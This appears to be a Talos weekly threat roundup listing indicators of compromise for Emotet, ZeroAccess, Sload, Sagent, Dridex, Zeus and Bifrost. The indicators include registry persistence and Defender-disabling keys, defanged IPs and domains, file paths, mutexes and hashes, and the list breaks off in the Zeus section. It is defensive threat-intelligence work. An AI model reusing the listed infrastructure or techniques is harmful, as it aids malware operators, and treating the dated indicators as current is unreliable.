Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 18 and Sept. 25. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org , or ClamAV.net .
For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
The most prevalent threats highlighted in this roundup are:
Threat Name Type Description Doc.Malware.Emotet-9762291-0
Malware
Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Trojan.ZeroAccess-9762336-0
Trojan
ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click fraud campaigns.
Doc.Malware.Sload-9762314-0
Malware
The Sload downloader launches PowerShell and gathers information about the infected system. The PowerShell may download the final payload or another downloader.
Doc.Malware.Sagent-9762330-0
Malware
Sagent downloads and executes a binary using Powershell from a Microsoft Word document.
Win.Packed.Dridex-9762380-0
Packed
Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Packed.Zeus-9762533-1
Packed
Zeus is a trojan that steals information such as banking credentials using methods such as key-logging and form-grabbing.
Win.Trojan.Bifrost-9762706-0
Trojan
Bifrost is a backdoor with more than 10 variants. Bifrost uses the typical server, server builder, and client backdoor program configuration to allow a remote attacker, who uses the client to execute arbitrary code on the compromised machine. Bifrost contains standard RAT features including a file manager, screen capture utility, keylogging, video recording, microphone and camera monitoring, and a process manager. Bifrost uses a mutex that may be named "Bif1234," or "Tr0gBot" to mark
its presence on the
Threat Breakdown Doc.Malware.Emotet-9762291-0 Indicators of Compromise IOCs collected from dynamic analysis of 54 samples Registry Keys Occurrences <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI
Value Name: Type
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI
Value Name: ErrorControl
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI
Value Name: DisplayName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI
Value Name: WOW64
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI
Value Name: ObjectName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT
Value Name: Type
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT
Value Name: ErrorControl
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT
Value Name: DisplayName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT
Value Name: WOW64
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT
Value Name: ObjectName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI
Value Name: ImagePath
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI
Value Name: Description
2
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 74[.]219[.]172[.]26
54
34[.]192[.]19[.]33
54
209[.]105[.]242[.]72
14
134[.]209[.]36[.]254
7
120[.]138[.]30[.]150
2
104[.]156[.]59[.]7
2
Domain Names contacted by malware. Does not indicate maliciousness Occurrences geevida[.]com
54
elrofanfoods[.]com
14
e13678[.]dspb[.]akamaiedge[.]net
2
api[.]w[.]org
1
gmpg[.]org
1
www[.]yelp[.]com
1
Files and or directories created Occurrences %HOMEPATH%\FsZ5e2W
54
%HOMEPATH%\FsZ5e2W\ZVF7izO
54
%HOMEPATH%\Fsz5e2w\Zvf7izo\Waqihok7.exe
54
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>
15
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp
5
%System32%\KBDUGHR\PCPKsp.exe (copy)
1
%System32%\KBDMLT48\OobeFldr.exe (copy)
1
%System32%\certmgr\microsoft-windows-processor-aggregator-events.exe (copy)
1
%System32%\logagent\PlayToReceiver.exe (copy)
1
%System32%\pots\sdchange.exe (copy)
1
%System32%\SettingsHandlers_Geolocation\Windows.AccountsControl.exe (copy)
1
%System32%\TabSvc\SurfaceHubHandlers.exe (copy)
1
%System32%\KBDUSR\pcsvDevice.exe (copy)
1
%System32%\syncui\dot3mm.exe (copy)
1
%System32%\RpcRtRemote\shellstyle.exe (copy)
1
%System32%\PersonaX\sas.exe (copy)
1
%System32%\sbeio\DevicePairingProxy.exe (copy)
1
File Hashes 02451c13f63ed93c6ed0c0e4a3025100834fd59eeaa78acff45d726c056b2293
06875ecfcdad40771a2a6d4ea795ebf797776a5fb3289a4f4f6207dc2d4ff91f
07687b2d27dd0a53f82aaa9379b2bd9e62b3e60c83dc4cf2820fe254a93190d4
0d987ad0bb7b11f4b0ac95bf8738d54798555aa9a230cb070fe3d465424939f4
0f8ad495b637bd894dc76a691518d635d697c1caa4991bb75c8a17f010863e73
1507825b3185d4763904f53704f18fd1157aeb1eb25ec77e5643e8a48173e53f
1c3544c3d12411b68e3260fa40e9dc0826c344c9a131928a04c7f8f517166645
1e5ed60832baaf0e362870373615cff90279bbbc4e544c76224f7528687276ee
201b4b59a31c60055c285e64737d5bcba8974b4400c27f37765636deea097b30
234a1653236e959e6329aec64c1de58538db56e66156f95517c05b62487d70ff
25a6131ae25ca2ee10362cdc735535fed0c9bf3698dcb965b751015139477987
25d1788ec133f048b97e9f205cf6c7b69e50ed0418bd9877553aba8a7bdaefc8
278fc88598a0bfe49be55465fdb975272c6315e3845d604caba7631cc5f32595
2ed87b6a729e1a7f3e6630bab57b2254b83a7cf47124bdee8823e08453bbc917
31cb369a681abfdf77ba8e1aeddac6d335200c11fae59ddd6f757c0963573499
32eec3ec66c12e442e79982e74f902432abb353ca97501ad43d92c300a1fbc4e
37af168ebcdcec12d2835ecc3a569839ed4660717927ae3ab0cc6a4b8a733012
3cddfe22684c82c3eeeb0d3c0c8745719dcd417db42c4ea6774c9a10d1a88f3b
4254483388cd90e041291de79b3a3d26456908113cb0b2957401b5838c949c38
4d88090314c39059da536bb37270cdf7ffadeeda4ea768b55dcb9f2b807586f4
4e7ccb75b3690d8fd48b74cb9d74c7c7129f5faa0b4898c6000509053c92d693
557b0821e60a4ec8b803e5fc3f9f0aed39d988bd8d1bd1ff7904c5f07fb24e1e
61e4e3e7481e9f2ac3b784204e98e7d81b4e61e329ce55376c3954c81f41de61
670c131402354de954057f1eb06650e55ee70a17fe5360b26daec2ba40917157
679e5f33c444b178b0da6da41a58b4590f05e7c464293e3b1d8f858dbe157124*See JSON for more IOCs
Coverage Product Protection AMP
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Threat Grid
Umbrella
WSA
Screenshots of Detection AMP
ThreatGrid
Malware
MITRE ATT&CK Win.Trojan.ZeroAccess-9762336-0 Indicators of Compromise IOCs collected from dynamic analysis of 67 samples Registry Keys Occurrences <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: DeleteFlag
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Start
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Start
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: DeleteFlag
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: DeleteFlag
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: DeleteFlag
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER
Value Name: Start
66
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Type
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: ErrorControl
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Type
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: ErrorControl
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Type
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: ErrorControl
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: DeleteFlag
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Type
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: ErrorControl
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Type
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: ErrorControl
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BFE
Value Name: Type
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BFE
Value Name: Start
66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BFE
Value Name: ErrorControl
66
Mutexes Occurrences Global\e885f9a1-f894-11ea-887e-00501e3ae7b6
1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 213[.]253[.]253[.]254
50
212[.]253[.]253[.]254
50
190[.]253[.]253[.]254
50
201[.]253[.]253[.]254
50
88[.]254[.]253[.]254
49
71[.]254[.]253[.]254
49
87[.]254[.]253[.]254
49
180[.]254[.]253[.]254
49
135[.]254[.]253[.]254
49
115[.]254[.]253[.]254
49
190[.]254[.]253[.]254
49
206[.]254[.]253[.]254
47
222[.]254[.]253[.]254
47
130[.]185[.]108[.]132
35
83[.]133[.]123[.]20
35
24[.]202[.]111[.]53
16
173[.]216[.]235[.]76
15
64[.]146[.]190[.]201
15
66[.]188[.]233[.]100
15
188[.]113[.]127[.]144
14
208[.]99[.]130[.]31
14
207[.]219[.]39[.]43
14
49[.]135[.]45[.]143
14
62[.]241[.]101[.]233
14
174[.]45[.]44[.]224
14
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences j[.]maxmind[.]com
66
Files and or directories created Occurrences %System32%\LogFiles\Scm\e22a8667-f75b-4ba9-ba46-067ed4429de8
66
%SystemRoot%\assembly\GAC_32\Desktop.ini
58
%SystemRoot%\assembly\GAC_64\Desktop.ini
58
\$Recycle.Bin\S-1-5-18
58
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f
58
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\@
58
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\L
58
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\U
58
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\n
58
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f
58
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\@
58
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\L
58
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\U
58
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\n
58
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\@
46
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\n
46
\systemroot\Installer\{0f210b53-2df0-43a6-b654-d5b43088f74f}
8
\systemroot\system32\services.exe
8
%System32%\services.exe
8
%SystemRoot%\Installer\{0f210b53-2df0-43a6-b654-d5b43088f74f}\@
8
%SystemRoot%\Installer\{0f210b53-2df0-43a6-b654-d5b43088f74f}\L
8
%SystemRoot%\Installer\{0f210b53-2df0-43a6-b654-d5b43088f74f}\U
8
\RECYCLER\S-1-5-18\$ad714f5b8798518b3ccb73fd900fd2ba\@
1
\RECYCLER\S-1-5-18\$ad714f5b8798518b3ccb73fd900fd2ba\n
1
\RECYCLER\S-1-5-21-1258710499-2222286471-4214075941-500\$ad714f5b8798518b3ccb73fd900fd2ba\@
1
*See JSON for more IOCs
File Hashes 027d20d6a1efcb5ba9979656607880bc3dd3a9bb93cd5c4580caa384558e8608
0462cdbb515473a57a6718a0c67b8080ab2877e8f3b78ba769422d4356a7115f
04acf9e5fa9b61a065104b93edea76f78771779eb48cb672c9f2d9315ff6bfa7
052c177b7f8bff5828877b0cc1f13265d21c0ffcbbb2c7a36669af28ed4437ea
05dc396f152310c171db0a352ef64295b946c0c1d88d75b1110a720932da573b
064b4db9024fe7e2dcf3af5c3e5d1b384d8f86aefd13462c173e8087321534c1
076ebb1c0bcdb6a45227c91893fde763951ac5b65c5419beda13cc407f594000
08c03f3a77d4ba9cf04067f3b8068a4b55fdb53228c418af86ca92d4993d11b3
0909c00d18b53fb3c524350d7bd201a9506d2e8729cf4139ba478e854f2e2a56
09191d60f0711e990ca49d9deb4bd02f550b2ad768061db9caa513f437e75b86
098981ab154b22e4fcfb761a620dc0ef49a0864af7f177788fc4b5af0ffd82fb
0aa0e17f078f84be105de834baadbb805e47676ca24bfa7d183b5a0191a56d94
0aba9aa08f1f8f4db1013651a5403a3aed32b7b933f8247c901f464a42b89437
0ad4671d4eed839271d13fb22a2f5681eb5447aafd8553c59b2ff7a2080954a7
0b122f16afc2332b2f7462404124bf9694ecd99668cc929ddecce44c86d979f4
0c96e65758b0f79da552648abbeeafda8af9d9721b43a8f4fc874c590eef094e
0d09a7af8e24901daa631c9cf9132e07ddd83e26606eb9652c9c043dc137b730
0d5cc14920e744aae16771a17c5db951367ae47b65280a36e1b5463f9461bbf0
0e72890f504f3037e80e1e9c8b4d49bf6d7d689710423f54168c03471159bb90
0fe11696c1292acf6c6f9820c9aec3f8b30b5e307c1b579c0fa7ade6d7da7729
108a5673df119343c22f450341c2c643f9c5353971a7560d66871467a9d52401
1289454b308d151ecd9ae0c3369624c8f3a19445ebe9ef6a72a9360ee4394865
14efd6ac66819cc9f7d3c61c7451dedb4c3368c1d5d00cef14ca75d88042d2bd
153612c7b1ee7a02ff87a09c40685c2c9bf58a1161441ceb388de35293848852
15e0c876c3015ca7e87643b9997397fcd68e1889e836a15980551e38c8b985dd*See JSON for more IOCs
Coverage Product Protection AMP
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Threat Grid
Umbrella
N/A
WSA
N/A
Screenshots of Detection AMP
ThreatGrid
MITRE ATT&CK Doc.Malware.Sload-9762314-0 Indicators of Compromise IOCs collected from dynamic analysis of 35 samples IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 217[.]144[.]104[.]39
35
103[.]214[.]167[.]114
35
51[.]254[.]205[.]84
35
2[.]59[.]117[.]6
35
139[.]162[.]210[.]105
35
103[.]130[.]219[.]49
35
67[.]199[.]248[.]10/31
31
51[.]77[.]231[.]185
2
Domain Names contacted by malware. Does not indicate maliciousness Occurrences www[.]litespeedtech[.]com
35
api[.]w[.]org
35
gmpg[.]org
35
t[.]me
35
www[.]xinwenlook[.]com
35
kpisolutions[.]net
35
fgyapim[.]com
35
atomic-soft[.]com
35
auto-boot-like[.]com
35
salamatbanoo[.]ir
35
bit[.]ly
31
aragrp[.]com
24
schema[.]org
6
e13678[.]dspb[.]akamaiedge[.]net
6
mysterythemes[.]com
6
demo[.]mysterythemes[.]com
6
www[.]aparat[.]com
4
data-vocabulary[.]org
1
image[.]rakuten[.]co[.]jp
1
www[.]shonanbbq[.]jp
1
thumbnail[.]image[.]rakuten[.]co[.]jp
1
shop[.]r10s[.]jp
1
www[.]rtl-theme[.]com
1
Files and or directories created Occurrences \Kiloperit\Loterios.exe
35
\Kiloperit
35
\Kiloperit\Groters.cmd
35
%ProgramData%\Helpot.vbs
35
%ProgramData%\Kolester.vbs
35
File Hashes 03c9fc78d2a6a7b6682111d70fd47483dbcce7b5b2b7395d9cb5e6bc53853b41
049fafbcead9f25231523454a2e9a0f6f53c1a994574d790725b5f7fdf9ad303
068e4de9a05da6cd60cea869b60a1b35b074d2d1209825ac8503ab0aff03e6a4
08f1e023603c5bbded2234f3da049ee5099d6acb02bd67f316755d3b5f05d8f5
0b74d64a1aa19b4cbf85eb94621ef62ea2a32d0b6fe7879f367e9b8de0816430
0e36f81f0332a4b6bca8e807abb020fe654be9a3e9022aed3ea071f888e97fdf
0f724265d9d4e4ffc4581971c97888235f8593435ff8c608e3cc53397bb5431d
0fdfa93636214d614b2b094d8a03de06abc0364ff5a4abfcbd0d9aa4f826521e
0ff59a32b7bb2a427995b7ada58410acd2aaf9a5a2a1b430300bb47bc678a269
1169a93ffa8c8a5b0a59f9c40b87fb10aca1400afabc34c8319a23b94e327312
16373f1b4582fefb527d420af700d11aabea5f8d04d4481a03253d698b5ed94f
182cedbb86f96a286d1f96d07a4aae0657e00759e68f35ac9b676e7a176d6dbf
1fdae763089dbe2e5e7083aa069b7cecb329d1e894cf443f11fa87b3cbe72919
20a600f4b85f601331e413e77e01def30375b5d12e8da0e283492fbf21603244
221aa40298b5256a2b79a0ba852c44f4f23e140461741ea73d686965e38a1361
258b991f4469d86316d73570a60c90ab04e5a4acd04c5685f9008df04a1c07df
26006a31ba4d51e415e005679b9ea5ea774d0e514668d0f77b53eafc60233bec
284db9216a0a55d8a72701e87aaea55eee5ac946dad7b37448f4eeb50e178989
2d140448346ac6b67b82091edceb992173989430b8b85fd55568a93e4092a625
2de306c8ff840bf87140f7774c0ed7c6dcbd4ada5db466311d8b9646d121afe0
34155568221422e29e5dc298e3e3be175f011b1e3412d32aba1676bfa3d5f995
3a2a758659051bb3a626c13d9eab2397d140de4b637a3e950e710d53a31fb017
3b6a9c380922f886ae04d45f888415278f0a5c7f7915f7f10f119ce042dc605c
3e90ed6a177d0200853ef7cffd29d202309a8b2d1d2006b7e3b89aa1a28de58e
3eca4c3c9bc710f41c2f8d947aba877de39f5c887e4b1d1d29950a729216472c*See JSON for more IOCs
Coverage Product Protection AMP
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Threat Grid
Umbrella
WSA
Screenshots of Detection AMP
ThreatGrid
MITRE ATT&CK Doc.Malware.Sagent-9762330-0 Indicators of Compromise IOCs collected from dynamic analysis of 18 samples Registry Keys Occurrences <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\CRYPTOGRAPHY\AUTOENROLLMENT
18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004119110000000000000000F01FEC
Value Name: VBAFiles
3
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 13[.]32[.]202[.]80
1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences fantasticvilla[.]xyz
18
e13678[.]dspb[.]akamaiedge[.]net
9
Files and or directories created Occurrences %HOMEPATH%\N5uIJVSp.dll
18
%APPDATA%\PC
18
%HOMEPATH%\N5uIJVSp.doc (copy)
18
%HOMEPATH%\N5uIJVSp.xls (copy)
18
File Hashes 069e5be54a90423032dfb6d1427e79a9b0381b4ffd062b654a7cdf9764b89bc7
08e372f1bc0ab96dde9ffb0f62335dbe3556e40e11e1f49eec40454915b72a43
1d844ffbf1b97697df3bc2a3ad68d66cdfe697c7b73c49c5c877910846a400dc
240d2dc4b7fe6e02afcb86581c04c97afc57ce646a63d3abcecbddf82e550aae
392eb105fbbc2990e8dc4f218d15a6a969d685230404d4b1af0339e8f694ae90
4a0b98b381bd601807bff594232ec7364d16dab8625cea24b4cf2dfeda2b1722
6701a28e9f57760ba2816239bf9e4fe1cd0d6150b20b2e72d6eef8cdf64739db
6d1cb4ece476b54c928e1347fd2449594bb075e16b6ba4deea1fc573a63e4d8f
94c6b071d11e998abc16abbb0c3a8d856027a9eb410d6d70535f50ea2d7e0883
9f847b64223c4f284777b6eeeba9736b774d64dfccf626f0f9c1a3f1e3dfbd0f
b38940afbc89af2a23ccb1c840c72f491fbb4cb955d82d43a83389660989a511
b7f0ec3f3b6a646ef56ab82745f31acbf842f4c107eee2b806f472867d2d96b1
c489afa673a152b4d4358d2541f8bf6256422d752f6a982aa5a9bc7c96d70b69
c6cd1a6759f8ea66bccc06824ed5d45c12d99c7b439f86151bf81c7f9c37ec15
e0d529d5aca4158976cbe5fa6578db3bc2dc2d962b01f0ade9626607e4b86613
e62efa2caf7914cd07c175ea92e67a41a24d88232fd36fa3518a97b418f4561f
eb5fb231b6e4e0afaa51fbd2d91035d0f1f6369aaf69236a6acb5d3ac63f88c4
edd370a3535870cbd5e9b63d309cd380a57a9cf211b24dccac5ea31504674104Coverage Product Protection AMP
Cloudlock
N/A
CWS
Email Security
Network Security
N/A
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Threat Grid
Umbrella
WSA
Screenshots of Detection AMP
ThreatGrid
Malware
MITRE ATT&CK Win.Packed.Dridex-9762380-0 Indicators of Compromise IOCs collected from dynamic analysis of 23 samples Registry Keys Occurrences <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
23
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
23
Mutexes Occurrences 4oj60dJ9Xs
2
DUxkg1Zly8
2
FsmwiIaXQJ
2
RgbpTIRzqH
2
S20rHVn78p
2
YK0jORqGpm
2
oQlriA2SC2
2
pYAqiKTy6G
2
ysjNUhI3fQ
1
OxxTJgAuGK
1
ZSiWxuslLF
1
3HZo5rwPDk
1
oxdyH9R916
1
U0nOF345iD
1
OQuDgnKjgb
1
Dg8OhX9ks5
1
ONdWouHBjG
1
qNKBbYN3Gk
1
KFJYC8aEJf
1
bZtEUuuwxr
1
eIR1MIHbxz
1
CFoRQitvit
1
Nq7tHYXINb
1
JgRLdW3NCE
1
qrgIwZpieG
1
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 172[.]217[.]10[.]110
23
104[.]23[.]99[.]190
14
104[.]23[.]98[.]190
13
72[.]21[.]81[.]240
7
74[.]125[.]192[.]102
7
74[.]125[.]192[.]100/31
7
205[.]185[.]216[.]10
6
74[.]125[.]192[.]113
6
74[.]125[.]192[.]139
3
205[.]185[.]216[.]42
1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences pastebin[.]com
23
ctldl[.]windowsupdate[.]com
14
cs11[.]wpc[.]v0cdn[.]net
7
cds[.]d2s7q6s2[.]hwcdn[.]net
7
www[.]cirrqqch1d[.]com
2
www[.]dwrutkyurj[.]com
2
www[.]eaoptse6xd[.]com
2
www[.]pddcairfkr[.]com
2
www[.]s570ijnkte[.]com
2
www[.]tbetwbt4lv[.]com
2
www[.]u2mhtlzsgn[.]com
2
www[.]y8bj6axylz[.]com
2
www[.]twrarbf1so[.]com
1
www[.]imxtrspuzg[.]com
1
www[.]ayyi7w08li[.]com
1
www[.]psmjdphj9d[.]com
1
www[.]twpm4fspo9[.]com
1
www[.]hmxcfbeqby[.]com
1
www[.]pgdigwtozq[.]com
1
www[.]waou2qqwkx[.]com
1
www[.]86lxhrlqmy[.]com
1
www[.]02n7kj0t9a[.]com
1
www[.]44cyorvjwu[.]com
1
www[.]ezrqi0knvw[.]com
1
www[.]6ephtujqmi[.]com
1
*See JSON for more IOCs
Files and or directories created Occurrences <malware cwd>\old_<malware exe name> (copy)
23
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy)
2
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp
2
File Hashes 035d479b0d8d6038778f5035ee923fd9122a04385872c8c6d71a4a293c910b93
0b4673a462153bae08b42d89a207e1e143ce6f1e09f1e699e6f3ac22fb71ec53
10640ef5faf9cd2940dc448d89eb0a88f2c5ecacc035e2935f7ca9382e67e2c3
1bd28ca2a03624886e95d6eb53ef2e235c52f7f516c7fc74745a54f02e781b31
27106585cf861dde191cbd4371669f986f26374e733a4ce2444de19f211d1c5c
3669ae6240e20cb0ee3d4fa94b139e23ade58f43f6440ebe63585dd21fbf57b6
40b56c85316aee14c1e3295b1f4d272b55a27e46b1726084c55b205da7d1c9bd
437396e9b50ead4451294d6eddf19208b89c290c908533bd1ca9263287fae470
4c472fbc64b2fe10e07709c2e404b918d7b89e715c2602f5397b0329774d1a2c
4e41a7d490526dbb89a51948086d61e4dc7e7cb1bfcbe719eb5d16352ce607ab
56d50c44ec8b0506fc2812867eb98267291f8cf0df0951f7fee825acca962b00
5eb49310bf7cbc3cbcf15a3441cc3febcd258f1ec66fb52ad5c9465fdb71cb33
741fc12e7bba22689b58326db0b693e6464319bd8efee22dc24b09f50c383688
78fde29214792451523f02665382130ee0e802299c9eb9b660b645504ba0dbdf
7b8b3c0b7ecf11495e8d52cdb4df0a1d1f2fe814a53304871e40f0276b4a3a77
833249b44657b7ed3da86063d8e1526f54d23d16550c2402a72799c5c74acf90
9dfb82625e7c32c29bb2ef43deb48e5d27fa3763a6021be7312db0308a00f6f9
c26e7ead6abe8250165448e53c573ef76c45842b3c14edf1568fe5d78cb70273
d2136443c3748082f2a34cdb75cbb5978083a32745b569e8ef26b1b104ca26d7
d542722be5855d84272c300d6a30d34de108aebd33dfd355354b438efcf1d972
d7b59bdf1a88095bd899b047b075f19d82725f7d0af43eab5e4da661b3c7925a
e378a7087b33cb75dcd2433a40b284d953d52aa76ce3fb0320248db3ff1bdbd5
ee1427a7f3bb0f1679308be1545c7552a46f53cdca2ec5cb10c66ae9aff7356dCoverage Product Protection AMP
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Threat Grid
Umbrella
N/A
WSA
N/A
Screenshots of Detection AMP
ThreatGrid
MITRE ATT&CK Win.Packed.Zeus-9762533-1 Indicators of Compromise IOCs collected from dynamic analysis of 25 samples Registry Keys Occurrences <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {2EC645E8-BA31-AD44-55BA-04D54CAC27C8}
11
<HKCU>\Software\Microsoft\<random, matching '[A-Z][a-z]{3,11}'>
11
<HKCU>\SOFTWARE\MICROSOFT\AZOJ
Value Name: 257f4325
1
<HKCU>\SOFTWARE\MICROSOFT\AZOJ
Value Name: 321172f
1
<HKCU>\SOFTWARE\MICROSOFT\AGHE
Value Name: 10g3jc8j
1
<HKCU>\SOFTWARE\MICROSOFT\AGHE
Value Name: 314c8b49
1
<HKCU>\SOFTWARE\MICROSOFT\AZOJ
Value Name: 2a478bcj
1
